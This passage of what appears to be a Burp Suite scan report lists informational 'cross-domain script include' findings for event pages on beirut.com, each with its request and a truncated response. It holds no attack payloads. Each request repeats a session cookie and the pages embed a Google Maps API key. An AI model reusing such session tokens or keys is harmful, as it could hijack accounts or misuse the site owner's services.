Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:08:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.702. http://www.beirut.com/ThingsToDo/Clemenceau/Fluks/5938

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Clemenceau/Fluks/5938

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Clemenceau/Fluks/5938 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:11:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.703. http://www.beirut.com/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:07:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.704. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Exhibitions/6382333962

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Exhibitions/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.705. http://www.beirut.com/ThingsToDo/Festivals/272910464

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Festivals/272910464

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Festivals/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.706. http://www.beirut.com/ThingsToDo/Gatherings/9274143605

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Gatherings/9274143605

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Gatherings/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.707. http://www.beirut.com/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74294


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.708. http://www.beirut.com/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:01:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94078


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.709. http://www.beirut.com/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:01:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.710. http://www.beirut.com/ThingsToDo/Hamra/Yasmina-Fayed/6158

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Hamra/Yasmina-Fayed/6158

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Hamra/Yasmina-Fayed/6158 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:01:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.711. http://www.beirut.com/ThingsToDo/Live-Music/560568055

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Live-Music/560568055

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Live-Music/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.712. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
